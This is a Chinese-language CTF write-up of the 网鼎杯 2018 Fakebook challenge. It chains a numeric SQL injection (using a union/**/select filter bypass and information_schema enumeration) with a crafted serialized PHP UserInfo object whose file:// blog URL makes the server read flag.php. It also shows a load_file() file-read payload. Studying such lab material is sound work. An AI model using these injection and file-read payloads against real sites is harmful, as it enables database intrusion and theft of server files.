[网鼎杯 2018]Fakebook

打开环境：

 

点击login，是个登录页面，试验后未发现SQL注入漏洞，点击jion是个注册页面，注册好后：

发现url上传了一个/view.php?no=1   在后面加个'发现报错：

说明存在SQL注入漏洞，为数字型，接着用order by 查出字段数为4，就联合查询union select 5,6,7,8 发现：

union select被过滤，此处可用union/**/select绕过，构造

no=-1 union/**/select 5,6,7,8

发现只有第二个字段能在username处显示，就查询数据库名：no=-1 union/**/select 1,database(),3,4  得到库名：fakebook   

 

接着爆表名，

no=-1 union/**/select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='fakebook'

   得到表名:users

接着爆列名：

no=-1 union/**/select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='users'

    得到字段： no,username,passwd,data,USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS     

接着查字段内容： no=-1 union/**/select 1,data,3,4 from users  一个个查询发现data字段中有个序列化的字符串： O:8:"UserInfo":3:{s:4:"name";s:1:"1";s:3:"age";i:1;s:4:"blog";s:13:" www.baidu.com"; }

接下来用工具（dirseach、御剑等）扫一扫这个环境，发现了robots.txt协议和flag.php,flag.php无法直接访问，访问robots.txt,发现:

一个user.php.bak的页面，访问下载得到该文件：

<?php

 

 

class UserInfo

{

    public $name = "";

    public $age = 0;

    public $blog = "";

 

    public function __construct($name, $age, $blog)

    {

        $this->name = $name;

        $this->age = (int)$age;

        $this->blog = $blog;

    }

 

    function get($url)

    {

        $ch = curl_init();

 

        curl_setopt($ch, CURLOPT_URL, $url);

        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

        $output = curl_exec($ch);

        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);

        if($httpCode == 404) {

            return 404;

        }

        curl_close($ch);

 

        return $output;

    }

 

    public function getBlogContents ()

    {

        return $this->get($this->blog);

    }

 

    public function isValidBlog ()

    {

        $blog = $this->blog;

        return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);

    }

 

}

代码审计一波： 首先了解一下里面出现的函数： curl_exec()函数使用不当就会造成 ssrf漏洞 ，到这里思路大概就出来了，flag.php可能处于内网无法直接访问（ 们可以填 http:127.0.0.1/flag.php  ,然后让上面说的调用get函数访问它并返回显示内容吗？不行，看上面源码，过滤了http/https ），如果ssrf访问flag.php大概理解是将我们输入的blog，调用get函数创建链接我们填的url，将访问该url返回的内容在页面输出。这里就是我们利用的点。发现 注册时候填写的blog地址会curl访问，并返回内容。但是存在严格的正则表达式匹配，我们不能直接访问flag.php。

就  需要 绕过http读取文件，就可以用flie协议： File协议主要用于 访问本地计算机中的文件 ，就如同在Windows资源管理器中打开文件一样。 要使用File协议，基本的格式如下： file:///文件路径 ，比如要打开F盘flash文件夹中的1.swf文件，那么可以在 资源管理器或浏览器地址栏 中输入： file:///f:/flash/1.swf 回车。

那为啥不在注册的时候blog直接填 file:///var/www/html/flag.php ，然后你会发现，报错不能注册。所以还得往下。

 

由上面的data字段内容可以得知，我们的注册信息，是以反序列化字符串储存的。以序列化的方式存储在data字段中，查询时返回序列化字符串后先进行反序列化后再提取blog网址。

那如果让它查询返回的是包含 file:///var/www/html/flag.php的序列化字符串，那它提取时就是访问了flag.php文件并返回。解决了上面注册的过滤。

所以，我们先构造一个php序列化字符串。

<?php

class UserInfo
{
    public $name = "1";
    public $age = 0;
    public $blog = "file:///var/www/html/flag.php";
    
}

$a = new UserInfo();
echo serialize($a);
?>

 

得到：

O:8:"UserInfo":3:{s:4:"name";s:1:"1";s:3:"age";i:1;s:4:"blog";s:29:"file:///var/www/html/flag.php";}

 

 

所以，只需要让它返回我们构造的php序列化字符串里的内容，再一次sql联合注入，返回查询内容为file:///var/www/html/flag.php

 

no=-1 union/**/select 1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:1:"1";s:3:"age";i:1;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'

 

iframe标签里，有base64编码后的字符串，点击就是flag。

 

 

这就是这个题目有意思的地方。它应该是第四列那个参数的位置进行反序列化，然后使用了getBlogContents()函数，得到blog的内容。因此我们可以考虑自己构造第四列的参数，让后端反序列化，从而读取flag文件。

 

 

其它方法

看wp还看到一种解法，直接通过sql读取函数直接读取flag.php文件

?no=100 union/**/select 1,load_file('/var/www/html/flag.php'),3,4 #